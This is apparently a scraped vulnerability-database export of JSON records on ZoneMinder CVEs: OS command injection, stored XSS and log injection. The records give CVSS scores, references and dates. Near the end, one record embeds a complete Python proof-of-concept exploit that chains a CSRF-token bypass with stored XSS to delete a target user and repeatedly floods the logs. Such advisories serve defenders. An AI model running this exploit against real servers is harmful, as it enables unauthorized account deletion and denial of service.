"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"id": "CVE-2023-26039",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "security-advisories@github.com",
"availabilityImpact": "NONE",
"baseScore": 7.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "LOW",
"exploitabilityScore": 2.8,
"id": "CVE-2023-26039",
"impactScore": 4.2,
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 8.8,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2023-26039",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "Low",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2023-26039",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "security-advisories@github.com",
"id": "CVE-2023-26039",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2023-26039",
"trust": 0.8,
"value": "High"
},
{
"author": "CNNVD",
"id": "CNNVD-202302-2014",
"trust": 0.6,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2023-004661"
},
{
"db": "CNNVD",
"id": "CNNVD-202302-2014"
},
{
"db": "NVD",
"id": "CVE-2023-26039"
},
{
"db": "NVD",
"id": "CVE-2023-26039"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "ZoneMinder is a free, open source Closed-circuit television software application for Linux which supports IP, USB and Analog cameras. Versions prior to 1.36.33 and 1.37.33 contain an OS Command Injection via daemonControl() in (/web/api/app/Controller/HostController.php). Any authenticated user can construct an api command to execute any shell command as the web user. This issue is patched in versions 1.36.33 and 1.37.33. ZoneMinder for, OS A command injection vulnerability exists.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state",
"sources": [
{
"db": "NVD",
"id": "CVE-2023-26039"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-004661"
},
{
"db": "VULMON",
"id": "CVE-2023-26039"
}
],
"trust": 1.71
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2023-26039",
"trust": 3.4
},
{
"db": "JVNDB",
"id": "JVNDB-2023-004661",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-202302-2014",
"trust": 0.6
},
{
"db": "OTHER",
"id": "NONE",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2023-26039",
"trust": 0.1
}
],
"sources": [
{
"db": "OTHER",
"id": null
},
{
"db": "VULMON",
"id": "CVE-2023-26039"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-004661"
},
{
"db": "CNNVD",
"id": "CNNVD-202302-2014"
},
{
"db": "NVD",
"id": "CVE-2023-26039"
}
]
},
"id": "VAR-202302-1970",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "OTHER",
"id": null
}
],
"trust": 0.01
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"camera device"
],
"sub_category": "camera",
"trust": 0.1
}
],
"sources": [
{
"db": "OTHER",
"id": null
}
]
},
"last_update_date": "2025-01-30T20:59:08.874000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "ZoneMinder Fixes for operating system command injection vulnerabilities",
"trust": 0.6,
"url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=228052"
}
],
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202302-2014"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-78",
"trust": 1.0
},
{
"problemtype": "OS Command injection (CWE-78) [NVD evaluation ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2023-004661"
},
{
"db": "NVD",
"id": "CVE-2023-26039"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.5,
"url": "https://github.com/zoneminder/zoneminder/security/advisories/ghsa-44q8-h2pw-cc9g"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-26039"
},
{
"trust": 0.6,
"url": "https://cxsecurity.com/cveshow/cve-2023-26039/"
},
{
"trust": 0.1,
"url": "https://ieeexplore.ieee.org/abstract/document/10769424"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
}
],
"sources": [
{
"db": "OTHER",
"id": null
},
{
"db": "VULMON",
"id": "CVE-2023-26039"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-004661"
},
{
"db": "CNNVD",
"id": "CNNVD-202302-2014"
},
{
"db": "NVD",
"id": "CVE-2023-26039"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "OTHER",
"id": null
},
{
"db": "VULMON",
"id": "CVE-2023-26039"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-004661"
},
{
"db": "CNNVD",
"id": "CNNVD-202302-2014"
},
{
"db": "NVD",
"id": "CVE-2023-26039"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2023-02-25T00:00:00",
"db": "VULMON",
"id": "CVE-2023-26039"
},
{
"date": "2023-11-01T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2023-004661"
},
{
"date": "2023-02-25T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202302-2014"
},
{
"date": "2023-02-25T02:15:13.957000",
"db": "NVD",
"id": "CVE-2023-26039"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2023-02-26T00:00:00",
"db": "VULMON",
"id": "CVE-2023-26039"
},
{
"date": "2023-11-01T02:47:00",
"db": "JVNDB",
"id": "JVNDB-2023-004661"
},
{
"date": "2023-03-08T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202302-2014"
},
{
"date": "2023-03-07T16:43:53.087000",
"db": "NVD",
"id": "CVE-2023-26039"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202302-2014"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "ZoneMinder\u00a0 In \u00a0OS\u00a0 Command injection vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2023-004661"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "operating system commend injection",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202302-2014"
}
],
"trust": 0.6
}
}
VAR-202302-1997
Vulnerability from variot - Updated: 2025-01-30 20:46ZoneMinder is a free, open source Closed-circuit television software application for Linux which supports IP, USB and Analog cameras. Versions prior to 1.36.33 are vulnerable to Cross-site Scripting. Log entries can be injected into the database logs, containing a malicious referrer field. This is unescaped when viewing the logs in the web ui. This issue is patched in version 1.36.33
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202302-1997",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "zoneminder",
"scope": "lt",
"trust": 1.0,
"vendor": "zoneminder",
"version": "1.36.33"
},
{
"model": "zoneminder",
"scope": "gte",
"trust": 1.0,
"vendor": "zoneminder",
"version": "1.37.0"
},
{
"model": "zoneminder",
"scope": "lt",
"trust": 1.0,
"vendor": "zoneminder",
"version": "1.37.33"
},
{
"model": "zoneminder",
"scope": "eq",
"trust": 0.8,
"vendor": "zoneminder",
"version": null
},
{
"model": "zoneminder",
"scope": "eq",
"trust": 0.8,
"vendor": "zoneminder",
"version": "1.37.0 that\u0027s all 1.37.33"
},
{
"model": "zoneminder",
"scope": "eq",
"trust": 0.8,
"vendor": "zoneminder",
"version": "1.36.33"
},
{
"model": "zoneminder",
"scope": null,
"trust": 0.8,
"vendor": "zoneminder",
"version": null
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2023-004653"
},
{
"db": "NVD",
"id": "CVE-2023-25825"
}
]
},
"cve": "CVE-2023-25825",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"exploitabilityScore": 2.8,
"id": "CVE-2023-25825",
"impactScore": 2.7,
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"trust": 1.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "security-advisories@github.com",
"availabilityImpact": "NONE",
"baseScore": 7.7,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.1,
"id": "CVE-2023-25825",
"impactScore": 4.0,
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 6.1,
"baseSeverity": "Medium",
"confidentialityImpact": "Low",
"exploitabilityScore": null,
"id": "CVE-2023-25825",
"impactScore": null,
"integrityImpact": "Low",
"privilegesRequired": "None",
"scope": "Changed",
"trust": 0.8,
"userInteraction": "Required",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2023-25825",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "security-advisories@github.com",
"id": "CVE-2023-25825",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2023-25825",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNNVD",
"id": "CNNVD-202302-2027",
"trust": 0.6,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2023-004653"
},
{
"db": "CNNVD",
"id": "CNNVD-202302-2027"
},
{
"db": "NVD",
"id": "CVE-2023-25825"
},
{
"db": "NVD",
"id": "CVE-2023-25825"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "ZoneMinder is a free, open source Closed-circuit television software application for Linux which supports IP, USB and Analog cameras. Versions prior to 1.36.33 are vulnerable to Cross-site Scripting. Log entries can be injected into the database logs, containing a malicious referrer field. This is unescaped when viewing the logs in the web ui. This issue is patched in version 1.36.33",
"sources": [
{
"db": "NVD",
"id": "CVE-2023-25825"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-004653"
},
{
"db": "VULMON",
"id": "CVE-2023-25825"
}
],
"trust": 1.71
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2023-25825",
"trust": 3.4
},
{
"db": "JVNDB",
"id": "JVNDB-2023-004653",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-202302-2027",
"trust": 0.6
},
{
"db": "OTHER",
"id": "NONE",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2023-25825",
"trust": 0.1
}
],
"sources": [
{
"db": "OTHER",
"id": null
},
{
"db": "VULMON",
"id": "CVE-2023-25825"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-004653"
},
{
"db": "CNNVD",
"id": "CNNVD-202302-2027"
},
{
"db": "NVD",
"id": "CVE-2023-25825"
}
]
},
"id": "VAR-202302-1997",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "OTHER",
"id": null
}
],
"trust": 0.01
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"camera device"
],
"sub_category": "camera",
"trust": 0.1
}
],
"sources": [
{
"db": "OTHER",
"id": null
}
]
},
"last_update_date": "2025-01-30T20:46:46.789000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "ZoneMinder Fixes for cross-site scripting vulnerabilities",
"trust": 0.6,
"url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=228062"
}
],
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202302-2027"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-79",
"trust": 1.0
},
{
"problemtype": "Cross-site scripting (CWE-79) [NVD evaluation ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2023-004653"
},
{
"db": "NVD",
"id": "CVE-2023-25825"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.5,
"url": "https://github.com/zoneminder/zoneminder/commit/57bf25d39f12d620693f26068b8441b4f3f0b6c0"
},
{
"trust": 2.5,
"url": "https://github.com/zoneminder/zoneminder/security/advisories/ghsa-68vf-g4qm-jr6v"
},
{
"trust": 2.5,
"url": "https://github.com/zoneminder/zoneminder/commit/4637eaf9ea530193e0897ec48899f5638bdd6d81"
},
{
"trust": 2.5,
"url": "https://github.com/zoneminder/zoneminder/commit/e1028c1d7f23cc1e0941b7b37bb6ae5a04364308"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-25825"
},
{
"trust": 0.6,
"url": "https://cxsecurity.com/cveshow/cve-2023-25825/"
},
{
"trust": 0.1,
"url": "https://ieeexplore.ieee.org/abstract/document/10769424"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
}
],
"sources": [
{
"db": "OTHER",
"id": null
},
{
"db": "VULMON",
"id": "CVE-2023-25825"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-004653"
},
{
"db": "CNNVD",
"id": "CNNVD-202302-2027"
},
{
"db": "NVD",
"id": "CVE-2023-25825"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "OTHER",
"id": null
},
{
"db": "VULMON",
"id": "CVE-2023-25825"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-004653"
},
{
"db": "CNNVD",
"id": "CNNVD-202302-2027"
},
{
"db": "NVD",
"id": "CVE-2023-25825"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2023-02-25T00:00:00",
"db": "VULMON",
"id": "CVE-2023-25825"
},
{
"date": "2023-11-01T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2023-004653"
},
{
"date": "2023-02-25T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202302-2027"
},
{
"date": "2023-02-25T01:15:56.627000",
"db": "NVD",
"id": "CVE-2023-25825"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2023-02-26T00:00:00",
"db": "VULMON",
"id": "CVE-2023-25825"
},
{
"date": "2023-11-01T02:05:00",
"db": "JVNDB",
"id": "JVNDB-2023-004653"
},
{
"date": "2023-03-08T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202302-2027"
},
{
"date": "2023-11-07T04:09:13.720000",
"db": "NVD",
"id": "CVE-2023-25825"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202302-2027"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "ZoneMinder\u00a0 Cross-site scripting vulnerability in",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2023-004653"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "XSS",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202302-2027"
}
],
"trust": 0.6
}
}
VAR-202210-0071
Vulnerability from variot - Updated: 2025-01-30 20:08ZoneMinder is a free, open source Closed-circuit television software application. Affected versions of zoneminder are subject to a vulnerability which allows users with "View" system permissions to inject new data into the logs stored by Zoneminder. This was observed through an HTTP POST request containing log information to the "/zm/index.php" endpoint. Submission is not rate controlled and could affect database performance and/or consume all storage resources. Users are advised to upgrade. There are no known workarounds for this issue. ZoneMinder There is an input validation vulnerability in.Information is tampered with and service operation is interrupted (DoS) It may be in a state. # Exploit Title: Zoneminder v1.36.26 - Log Injection -> CSRF Bypass -> Stored Cross-Site Scripting (XSS)
Date: 10/01/2022
Exploit Author: Trenches of IT
Vendor Homepage: https://github.com/ZoneMinder/zoneminder
Version: v1.36.26
Tested on: Linux/Windows
CVE: CVE-2022-39285, CVE-2022-39290, CVE-2022-39291
Writeup: https://www.trenchesofit.com/2022/09/30/zoneminder-web-app-testing/
Proof of Concept:
1 - The PoC injects a XSS payload with the CSRF bypass into logs. (This action will repeat every second until manually stopped)
2 - Admin user logs navigates to http:///zm/index.php?view=log
3 - XSS executes delete function on target UID (user).
import requests import re import time import argparse import sys
def getOptions(args=sys.argv[1:]): parser = argparse.ArgumentParser(description="Trenches of IT Zoneminder Exploit PoC", epilog="Example: poc.py -i 1.2.3.4 -p 80 -u lowpriv -p lowpriv -d 1") parser.add_argument("-i", "--ip", help="Provide the IP or hostname of the target zoneminder server. (Example: -i 1.2.3.4", required=True) parser.add_argument("-p", "--port", help="Provide the port of the target zoneminder server. (Example: -p 80", required=True) parser.add_argument("-zU", "--username", help="Provide the low privileged username for the target zoneminder server. (Example: -zU lowpriv", required=True) parser.add_argument("-zP", "--password", help="Provide the low privileged password for the target zoneminder server. (Example: -zP lowpriv", required=True) parser.add_argument("-d", "--deleteUser", help="Provide the target user UID to delete from the target zoneminder server. (Example: -d 7", required=True) options = parser.parse_args(args) return options
options = getOptions(sys.argv[1:])
payload = "http%3A%2F%2F" + options.ip + "%2Fzm%2F<script src='/zm/index.php?view=options&tab=users&action=delete&markUids[]=" + options.deleteUser + "&deleteBtn=Delete'"
Request to login and get the response headers
loginUrl = "http://" + options.ip + ":" + options.port + "/zm/index.php?action=login&view=login&username="+options.username+"&password="+options.password loginCookies = {"zmSkin": "classic", "zmCSS": "base", "zmLogsTable.bs.table.pageNumber": "1", "zmEventsTable.bs.table.columns": "%5B%22Id%22%2C%22Name%22%2C%22Monitor%22%2C%22Cause%22%2C%22StartDateTime%22%2C%22EndDateTime%22%2C%22Length%22%2C%22Frames%22%2C%22AlarmFrames%22%2C%22TotScore%22%2C%22AvgScore%22%2C%22MaxScore%22%2C%22Storage%22%2C%22DiskSpace%22%2C%22Thumbnail%22%5D", "zmEventsTable.bs.table.searchText": "", "zmEventsTable.bs.table.pageNumber": "1", "zmBandwidth": "high", "zmHeaderFlip": "up", "ZMSESSID": "f1neru6bq6bfddl7snpjqo6ss2"} loginHeaders = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Origin": "http://"+options.ip, "Connection": "close", "Referer": "http://"+options.ip+"/zm/index.php?view=login", "Upgrade-Insecure-Requests": "1"} response = requests.post(loginUrl, headers=loginHeaders, cookies=loginCookies) zmHeaders = response.headers try: zoneminderSession = re.findall(r'ZMSESSID\=\w+\;', str(zmHeaders)) finalSession = zoneminderSession[-1].replace('ZMSESSID=', '').strip(';') except: print("[ERROR] Ensure the provided username and password is correct.") sys.exit(1) print("Collected the low privilege user session token: "+finalSession)
Request using response headers to obtain CSRF value
csrfUrl = "http://"+options.ip+":"+options.port+"/zm/index.php?view=filter" csrfCookies = {"zmSkin": "classic", "zmCSS": "base", "zmLogsTable.bs.table.pageNumber": "1", "zmEventsTable.bs.table.columns": "%5B%22Id%22%2C%22Name%22%2C%22Monitor%22%2C%22Cause%22%2C%22StartDateTime%22%2C%22EndDateTime%22%2C%22Length%22%2C%22Frames%22%2C%22AlarmFrames%22%2C%22TotScore%22%2C%22AvgScore%22%2C%22MaxScore%22%2C%22Storage%22%2C%22DiskSpace%22%2C%22Thumbnail%22%5D", "zmEventsTable.bs.table.searchText": "", "zmEventsTable.bs.table.pageNumber": "1", "zmBandwidth": "high", "zmHeaderFlip": "up", "ZMSESSID": '"' + finalSession + '"'} csrfHeaders = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Connection": "close", "Referer": "http://"+options.ip+"/zm/index.php?view=montagereview&fit=1&minTime=2022-09-30T20:52:58&maxTime=2022-09-30T21:22:58¤t=2022-09-30%2021:07:58&displayinterval=1000&live=0&scale=1&speed=1", "Upgrade-Insecure-Requests": "1"} response = requests.get(csrfUrl, headers=csrfHeaders, cookies=csrfCookies) zmBody = response.text extractedCsrfKey = re.findall(r'csrfMagicToken\s\=\s\"key\:\w+\,\d+', str(zmBody)) finalCsrfKey = extractedCsrfKey[0].replace('csrfMagicToken = "', '') print("Collected the CSRF key for the log injection request: "+finalCsrfKey) print("Navigate here with an admin user: http://"+options.ip+"/zm/index.php?view=log")
while True:
#XSS Request
xssUrl = "http://"+options.ip+"/zm/index.php"
xssCookies = {"zmSkin": "classic", "zmCSS": "base", "zmLogsTable.bs.table.pageNumber": "1", "zmEventsTable.bs.table.columns": "%5B%22Id%22%2C%22Name%22%2C%22Monitor%22%2C%22Cause%22%2C%22StartDateTime%22%2C%22EndDateTime%22%2C%22Length%22%2C%22Frames%22%2C%22AlarmFrames%22%2C%22TotScore%22%2C%22AvgScore%22%2C%22MaxScore%22%2C%22Storage%22%2C%22DiskSpace%22%2C%22Thumbnail%22%5D", "zmEventsTable.bs.table.searchText": "", "zmEventsTable.bs.table.pageNumber": "1", "zmBandwidth": "high", "zmHeaderFlip": "up", "ZMSESSID": finalSession}
xssHeaders = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0", "Accept": "application/json, text/javascript, */*; q=0.01", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "X-Requested-With": "XMLHttpRequest", "Origin": "http://"+options.ip, "Connection": "close", "Referer": "http://"+options.ip+"/zm/index.php?view=filter"}
xssData = {"__csrf_magic": finalCsrfKey , "view": "request", "request": "log", "task": "create", "level": "ERR", "message": "Trenches%20of%20IT%20PoC", "browser[name]": "Firefox", "browser[version]": "91.0", "browser[platform]": "UNIX", "file": payload, "line": "105"}
response = requests.post(xssUrl, headers=xssHeaders, cookies=xssCookies, data=xssData)
print("Injecting payload: " + response.text)
time.sleep(1)
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
